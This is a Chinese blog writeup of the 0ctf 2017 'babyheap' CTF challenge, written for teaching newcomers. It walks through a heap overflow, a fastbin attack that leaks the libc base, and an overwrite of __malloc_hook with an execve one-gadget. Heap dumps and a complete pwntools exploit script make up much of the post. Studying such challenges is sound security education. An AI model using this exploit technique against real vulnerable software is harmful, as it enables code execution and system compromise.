0ctfbabyheap题writeup

最新推荐文章于 2022-09-06 14:54:30 发布
最新推荐文章于 2022-09-06 14:54:30 发布
阅读量450 收藏
点赞数
分类专栏: writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44075052/article/details/107714489
版权

前言

因为最近一直在用印象笔记,想了想还是把wp搬到这里来比较好

这是我做的第一个堆题,想着可以拿来给大一刚来实验室的人培训,也为了巩固对堆的理解,固写下这个解题过程

题目分析

首先拿到题目,分析程序,程序所有保护都开了,是堆题的象征

在这里插入图片描述

然后逐个分析里面的函数,尝试寻找漏洞

在这里插入图片描述

最后发现在输入内容的时候,输入并没有得到很好的控制
因为连续申请的堆在物理地址上是连续的,这意味着我们可以利用溢出来实现对其他空闲的堆进行控制,这里我们用的是fastbin attack

不大于max_fast (默认值为64B)的chunk被释放后,首先会被放到fast bins 中,fast bins中的chunk并不改变它的使用标志P。这样也就无法将它们合并,当需要给用户分配的chunk小于或等于max_fast时,ptmalloc首先会在fastbins中查找相应的空闲块,然后才会去查找bins中的空闲chunk。

利用 fastbin attack 即 double free 的方式泄露 libc 基址,当只有一个 small/large chunk
被释放时,small/large chunk 的 fd 和 bk 指向 main_arena 中的地址,然后 fastbin attack
可以实现有限的地址写能力。

第一步:leak-泄露libc基地址

我们申请五个堆

allocate(0x20) ->0
allocate(0x20) ->1
allocate(0x20) ->2
alloctae(0x20) ->3
allocate(0x100) ->4
allocate(0x60) ->5 (这个堆是为了防止最后free的smallchunk和top chunk合并,后文不再出现)
0x555555757000: 0x0000000000000000 0x0000000000000031 //0
0x555555757010: 0x0000000000000000 0x0000000000000000
0x555555757020: 0x0000000000000000 0x0000000000000000
0x555555757030: 0x0000000000000000 0x0000000000000031 //1
0x555555757040: 0x0000000000000000 0x0000000000000000
0x555555757050: 0x0000000000000000 0x0000000000000000
0x555555757060: 0x0000000000000000 0x0000000000000031 //2
0x555555757070: 0x0000000000000000 0x0000000000000000
0x555555757080: 0x0000000000000000 0x0000000000000000
0x555555757090: 0x0000000000000000 0x0000000000000031 //3
0x5555557570a0: 0x0000000000000000 0x0000000000000000
0x5555557570b0: 0x0000000000000000 0x0000000000000000
0x5555557570c0: 0x0000000000000000 0x0000000000000111 //4
0x5555557570d0: 0x0000000000000000 0x0000000000000000
0x5555557570e0: 0x0000000000000000 0x0000000000000000

我们利用先后释放掉chunk1 和 chunk2此时他们都会被放到fastbin这个单链表上,“最近释放”的块会被放到表头,而在chunk2身上会有一个指向上一个空闲块的指针

free(1)
free(2)
0x555555757000: 0x0000000000000000 0x0000000000000031 //0
0x555555757010: 0x0000000000000000 0x0000000000000000
0x555555757020: 0x0000000000000000 0x0000000000000000
0x555555757030: 0x0000000000000000 0x0000000000000031 //1
0x555555757040: 0x0000000000000000 0x0000000000000000
0x555555757050: 0x0000000000000000 0x0000000000000000
0x555555757060: 0x0000000000000000 0x0000000000000031 //2
0x555555757070: 0x0000555555757030 0x0000000000000000
0x555555757080: 0x0000000000000000 0x0000000000000000
0x555555757090: 0x0000000000000000 0x0000000000000031 //3
0x5555557570a0: 0x0000000000000000 0x0000000000000000
0x5555557570b0: 0x0000000000000000 0x0000000000000000
0x5555557570c0: 0x0000000000000000 0x0000000000000111 //4
0x5555557570d0: 0x0000000000000000 0x0000000000000000
0x5555557570e0: 0x0000000000000000 0x0000000000000000

此时那个在chunk2身上的0x0000555555757030就是指向chunk1的指针,因为chunk1是上一个被释放的空闲块

此时我们需要做三件事

  1. 修改这个指针,让他指向我们申请的smallchunk,也就是chunk4
  2. 修改chunk4的size为(0x31),让他暂时的成为一个fastchunk
  3. 连续申请两次大小为0x20的堆,这样我们就有“名义上不一样,实际上是一样的”的两个堆chunk2和chunk4

payload = p64(0) * 5 + p64(0x31) + p64(0) * 5 + p64(0x31) #保护chunk1 chunk2的size
payload += p64(0x555555757090) + p64(0) * 4 #修改chunk2里面的指针
fill(0, payload)
payload = p64(0) * 5
payload += p64(0x31)
fill(3, payload)

0x555555757000: 0x0000000000000000 0x0000000000000031 //0
0x555555757010: 0x0000000000000000 0x0000000000000000
0x555555757020: 0x0000000000000000 0x0000000000000000
0x555555757030: 0x0000000000000000 0x0000000000000031 //1
0x555555757040: 0x0000000000000000 0x0000000000000000
0x555555757050: 0x0000000000000000 0x0000000000000000
0x555555757060: 0x0000000000000000 0x0000000000000031 //2
0x555555757070: 0x00005555557570c0 0x0000000000000000
0x555555757080: 0x0000000000000000 0x0000000000000000
0x555555757090: 0x0000000000000000 0x0000000000000031 //3
0x5555557570a0: 0x0000000000000000 0x0000000000000000
0x5555557570b0: 0x0000000000000000 0x0000000000000000
0x5555557570c0: 0x0000000000000000 0x0000000000000031 //4
0x5555557570d0: 0x0000000000000000 0x0000000000000000
0x5555557570e0: 0x0000000000000000 0x0000000000000000

然后我们申请两次0x20的堆,第二次申请的堆在物理地址上就会和我们之前申请的chunk4重合
我们把chunk4的size修改回原样后再free掉,这样我们就可以通过另外一个堆查看里面指向libc的指针!!!

allocate(0x20) 下标为1
alloctae(0x20) 下标为2
fill(…略,详情看后附代码)
free(4)
0x55613468e000: 0x0000000000000000 0x0000000000000031
0x55613468e010: 0x0000000000000000 0x0000000000000000
0x55613468e020: 0x0000000000000000 0x0000000000000000
0x55613468e030: 0x0000000000000000 0x0000000000000031
0x55613468e040: 0x0000000000000000 0x0000000000000000
0x55613468e050: 0x0000000000000000 0x0000000000000000
0x55613468e060: 0x0000000000000000 0x0000000000000031
0x55613468e070: 0x0000000000000000 0x0000000000000000
0x55613468e080: 0x0000000000000000 0x0000000000000000
0x55613468e090: 0x0000000000000000 0x0000000000000031
0x55613468e0a0: 0x0000000000000000 0x0000000000000000
0x55613468e0b0: 0x0000000000000000 0x0000000000000000
0x55613468e0c0: 0x0000000000000000 0x0000000000000111
0x55613468e0d0: 0x00007fb8010e1b78 0x00007fb8010e1b78 -->指向Libc中某处的地址
0x55613468e0e0: 0x0000000000000000 0x0000000000000000

此时我们只要使用dump(2)就能把这个libc地址给打印出来,而这个地址和基地址相差0x3c4b78
具体这个偏移是什么怎么算,我会另外写一篇小博客介绍,现在假设我们已知这个偏移继续我们的话题

第二步:getshell

我们已经有libc基地址了,那现在的问题是,如何让他执行execve("/bin/sh")
这里我们需要有一个知识的铺垫,关于malloc_hook函数

malloc_hook 是一个libc上的函数指针,调用malloc时如果该指针不为空则执行它指向的函数,可以通过写malloc_hook来getshell

同样的道理,我们可以fastbin attcak故技重施对malloc_hook上的内容进行改写
这里主要的关键就是我们可能不能像之前如此地方便的修改chunk的size所以我们有必要对于malloc_hook周围的内容做个分析
图中黄标的地址就是malloc_hook的内容,我们如果把getshell的地址放进去,那么执行malloc的时候就会getshell

然后我们需要往上翻到一个合适的能被作为chunk指针的地方,这个地方很巧妙基本上要我临场去找基本不可能,经过搜索众多博客这个地址也是经常搭配劫持malloc_hook来用的,所以记下来就好

在这里插入图片描述

如果chunk指针指向这个chunk,那么这个chunk size就是0x7f根据allocate的chunksize的检查机制(主要是对齐原则)我们可以申请0x60的堆来躲过这个检查机制

于是我们需要做下面几件事

  1. 申请一个0x60的堆,然后把他释放掉,这个chunk的物理地址会是在chunk3的下面
  2. 释放后我们把这个堆添加一个指向malloc_hook附近我们预期的一个地方,这样在我们连续两次申请堆的时候,就能申请到一个堆是在malloc_hook附近
  3. 连续申请两次0x60的堆,这样我们就可以利用第二个堆来改写malloc_hook地址上的内容

接下来我给出完整的EXP:

from pwn import *
context(log_level = 'debug')

DEBUG = 1
if DEBUG:
 p = process('./0ctfbabyheap.txt')
 libc = ELF('./libc.so.6')
else:
 p = remote()

def allocate(size):
 p.recvuntil('Command:')
 p.sendline('1')
 p.recvuntil('Size:')
 p.sendline(str(size))

def fill(index,content):
 p.recvuntil('Command:')
 p.sendline('2')
 p.recvuntil('Index:')
 p.sendline(str(index))
 p.recvuntil('Size:')
 p.sendline(str(len(content)))
 p.recvuntil('Content: ')
 p.send(content)

def free(index):
 p.recvuntil('Command:')
 p.sendline('3')
 p.recvuntil('Index:')
 p.sendline(str(index))

def dump(index):
 p.recvuntil('Command:')
 p.sendline('4')
 p.recvuntil('Index:')
 p.sendline(str(index))
 p.recvuntil(': \n')
 data = p.recvline()[:-1]
 return data

def leak():
 allocate(0x20)
 allocate(0x20)
 allocate(0x20)
 allocate(0x20)
 allocate(0x100)
 allocate(0x60)
 
 free(1)
 free(2)
 payload = p64(0) * 5 + p64(0x31) + p64(0) * 5 + p64(0x31)
 payload += p8(0xc0)
 fill(0,payload)
 
 payload = p64(0) * 5
 payload += p64(0x31)
 fill(3,payload)

 allocate(0x20)
 allocate(0x20)

 payload = p64(0) * 5
 payload += p64(0x111)
 fill(3,payload)
 free(4)
 gdb.attach(p)
 
 leaked = u64(dump(2)[:8]) - 0x3c4b78
 return leaked

def fastbin_attack(libc_base):
 malloc_hook = libc.symbols['__malloc_hook'] + libc_base
 execve_addr = libc_base + 0x4526a
 
 allocate(0x60)
 free(4)
 payload = p64(libc_base+0x3c4aed)
 log.info("payload:" + hex(libc_base+0x3c4aed))
 fill(2,payload)
 
 allocate(0x60)
 allocate(0x60)
 
 payload = payload  = p8(0) * 3
 payload += p64(0) * 2
 payload += p64(execve_addr)
 fill(6,payload)
 allocate(0x20)
 
def main():
 libc_base = leak()
 log.info("get libc_base:" + hex(libc_base))
 #gdb.attach(p)
 fastbin_attack(libc_base)
 p.interactive()
 
if __name__ == "__main__":
 main()
黑白佩
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
0ctfbabyheap2017WP——堆溢出fastbin attack初探
GeekCmore的博客
02-18 482
从栈溢出进入堆溢出,漏洞利用的复杂度上了一个大台阶,主要是因为 ptmalloc 内存管理器对于堆管理设计了复杂的数据结构和算法,要想进入堆溢出的学习,就必须厘清它们之间的关系。本文将从一个经典的例子——0ctfbabyheap2017 来介绍一个初级的 fastbin attack 以初探堆溢出攻击。
*ctf 2021 babyheap
z1r0的博客
06-28 216
查看保护 漏洞点在delete这里,存在一个uaf漏洞。 libc目用的是2.27-3ubuntu1.4,笔者用的2.27-3ubuntu1.5. 这个目需要注意的是edit的方式 大小是size - 8,是从heap_ptr - 8处开始,所以edit不可以直接修改fd。因为创建名字的时候可以使用0x400大小的size,所以考虑fastbin_dup_consolidate实现泄露libc和overlapping 注意一下edit方式就行了,exp如下...
0ctf_2017_babyheap详解
像初雪一样自由洒落
04-19 3767
本文主要列出0ctf_2017_babyheap的详细过程 主要参考:https://bbs.pediy.com/thread-223461.htm 程序流程 allocate:申请size大小的块 fill:对idx的块,设置size,并填入content free:释放idx的块 dump:打印idx的块内容 漏洞分析 fill中的size可以重新设置,故可以造成堆溢出。 方法:fastbin attack double free泄露libc 【small/large chunk释放,fd和.
0ctf babyheap
qq_41071646的博客
05-13 474
这个 一开始 不知道是怎么回事 然后这个程序开了 保护全开 基随机化 这就要我们自己把libc的基给泄露出来 泄露的方法我知道的是 把堆 free到 unsortbin的fd和bk指向自身main_arena 然后可以根据 main_arena 的偏移 搞出libc 库 道理都懂 但是怎么做 就不好说了 现在这里就有一道 典型的菜单 然后 看一下大概内容 有没...
0ctf_2017_babyheap
u014377094的博客
03-10 459
本人double free+fastbin攻击第一道,看了两天,好在理解下来不难。 参考传送门[分享]0ctf2017 - babyheap-Pwn-看雪论坛-安全社区|安全招聘|bbs.pediy.com 惯例checksec一下 打开ida 1创建chunk,按1,2依次创建,2往里,3free掉指定数字chunk,4print出指定chunk内容 不建议跟ida里一些函数死磕,硬读会恶心到,理解就ok。 这里先放exp,读一遍exp咱们再来解释 from pwn import
bugku杂项writeup
11-22
bugku杂项writeup
2023 强网杯 Writeup
最新发布
01-29
CTF Writeup 2023 强网杯 Writeup 是一篇关于 Capture The Flag(CTF)的 writeup,内容涵盖了多个挑战目,涉及到 Python、 Cryptography、Reverse Engineering、Web 等多个领域。下面是对每个挑战目的详细分析...
buuoj re逆向1-64writeup(截图+c++源码+过程).rar
12-31
buuoj re逆向1-64writeup(截图+c++源码+过程) 与前面发的一模一样,只不过打包了,喜欢的可以支持一下
[SECT2019] —writeup撰.docx
11-28
writeup CTF
ctf_writeup:来自 Balsn 的 CTF 文章
08-03
Balsn CTF 报道Balsn 是来自台湾的 CTF 团队,成立于 2016 年。我们积极参与 CTF 比赛,并发表有关挑战的文章。 在我们的 GitHub 存储库中,这些文章采用 markdown + kaTeX 格式。 有关更多信息,请参阅。...
CTF新生赛之Writeup
shikaku_的博客
11-27 4153
CTF新生赛之Writeup 作为零基础的新生,也是在开学后才了解了CTF,感觉本次新生赛中颇有收获,也是应赛制要求,故下这份WP,以纪念本人的第一次CTF竞赛。 回顾和感想 Misc 我也不知道为什么我要这个,我就了签到哈哈哈哈哈 过程是关注微信公众号SCUCTF,发送SCUx401CTF即可获得flag(不放图了) Web 因为是从Web入的门,所以先做的Web。这次新生赛做了六道,都是非常简单的。因为看不懂PHP语言所以无法继续向前走了555, Crypto ...
0ctf 2017 babyheap writeup
jmp esp
03-26 6280
前言坑比的我比赛的时候没有做。。第二天有课,赛后看了看,目其实没啥太多难度,可能也就是细节上需要注意一下吧目功能简单介绍一下目功能,因为我本机是用的linux,ida在虚拟机里,ida的复制又不是特别方便,所以我就不复制分析的情况了,具体分析自己做一下练习一下也比较好,就把大致的情况说明一下。首先是主菜单===== Baby Heap in 2017 ===== 1. Allocate 2
0ctf Babyheap 2017
Bill
03-11 6373
0ctf 2017 BabyHeap 1. 目分析 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 如果RELRO: Partial RELRO, 有可能是格式化字符串。 结论...
babyheap_0ctf_2017 详细解析【BUUCTF】
qq_41696518的博客
09-06 2769
好家伙,保护全开,根据文件名,可以判断这是一道堆目,刷了这么久,终于遇到堆目了,解析就的详细点。先看main函数,很简单就是各类个目录函数,一步一步来看把。
2017/2018-0ctf-babyheap-writeup
【xiaoxiaorenwu's blog】
04-07 766
因为最近2019届0ctf-tctf开始了,想去水一水,特别把2018的babyheap和2017的babyheap做了一下汲取一下经验,感觉两类型相似,大致思路相同,2018比2017的利用条件更加苛刻一些。所以把两个目放在一起来,有助于加深对fastbin_attack的理解,和提高知识运用的灵活性。 首先提供两道目的二进制文件:2017_0ctf_babyheap 2018...
MIPS架构的CTF逆向--SUCTFbabyrewriteup
iqiqiya的博客
10-18 3123
一,这道刚拿到的时候我是直接载入IDA    结果分析的一团糟 比赛结束之后  看了好多师傅wp  才知道mips架构的专用工具怎么用,比如retdec,jeb-mips 开始是打算用retdec的,结果在线版的https://retdec.com/decompilation/不能用了     感觉windows下不好装 有时间补坑 就选择了jeb-mips(试用版)  扯一点怎样下载...
360 CTF Writeup
翎羽阁
05-30 4798
0x00            小记这次360全国安全大赛,抱着试试看的心,捧回了西北区第一。真是,以后还要加油啊,不然太菜了被虐就不好玩了。         0x01            比赛两天,第一天是CTF类似的夺旗赛。王总的逆向就不说了,主要把我酱油的一些说说,总结共享一下思路。       1,网络协议 10       模拟iphone6访问网页。    
攻防世界PWN之Noleak(一学了好多知识)
seaaseesa的博客
11-13 3713
Noleak 本需要用到的知识有:malloc_hook、unsorted bin unlink、fastbin attack、partial write bypass PIE 首先,介绍一下malloc_hook,这是C语言提供的一个用来包装malloc的,类似还有free_hook,具体可以查阅相关资料学习 Malloc hook 我们看如下代码 #include&...
0CTF中的神奇宝贝WP
weixin_30527423的博客
03-31 111
前言: 今天被尘少拉去做 然后做到一个脑洞打开的。。。。。 神奇宝贝!?!? 正文: 一开始来到这=-= 弱密码猜测:admin admin 验证码用calc去算 然后成功进入 第一次去做神奇宝贝。。。。 然后点击轮廓得到flag,总结:千万不要相信CTF里的任何语言信一成都会死人 flag:flag{h0w_d1d_y0u_get_thiSs_gud_...
iscc2015官方writeup
09-06
iscc2015是国际信号与通信会议(International Symposium on Communication and Information Technologies)的官方writeup,在这个writeup中,主要回顾了iscc2015会议的主要内容和成果。 iscc2015会议是由IEEE(Institute of Electrical and Electronics Engineers)主办的,旨在聚集来自全球的学者、研究人员和专业人士,共同探讨和交流关于通信和信息技术领域的最新研究和发展。 这个writeup首先介绍了iscc2015会议的背景和目标,提及了该会议为促进学术界和工业界之间的合作、创新和知识交流所做的努力。接着,该writeup详细描述了iscc2015会议的主要议,包括通信网络、无线通信、数据通信和网络安全等方面。此外,还列举了一些重要的研究课和领域,如物联网、云计算、移动通信和多媒体通信等。 iscc2015的writeup还总结了会议期间的重要活动和成果。这些活动包括学术论文的研讨会和展示、专演讲、研讨会和研究项目的发布等。会议期间,各个领域的专家和学者积极参与并互相交流了关于通信和信息技术领域的最新研究成果和创新理念。 最后,iscc2015的官方writeup总结了会议的收获和影响。该会议为全球通信和信息技术领域的研究人员和专业人士提供了一个交流和合作的平台,推动了相关领域的发展和创新。此外,与会者还从中获得了有关新技术、新方法和最佳实践的信息和经验。 总之,iscc2015官方writeup回顾了这个国际会议的主要内容和成果,强调了其在通信和信息技术领域的重要性和影响。通过促进学术界和工业界之间的交流与合作,这个会议为促进全球通信和信息技术领域的发展做出了贡献。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值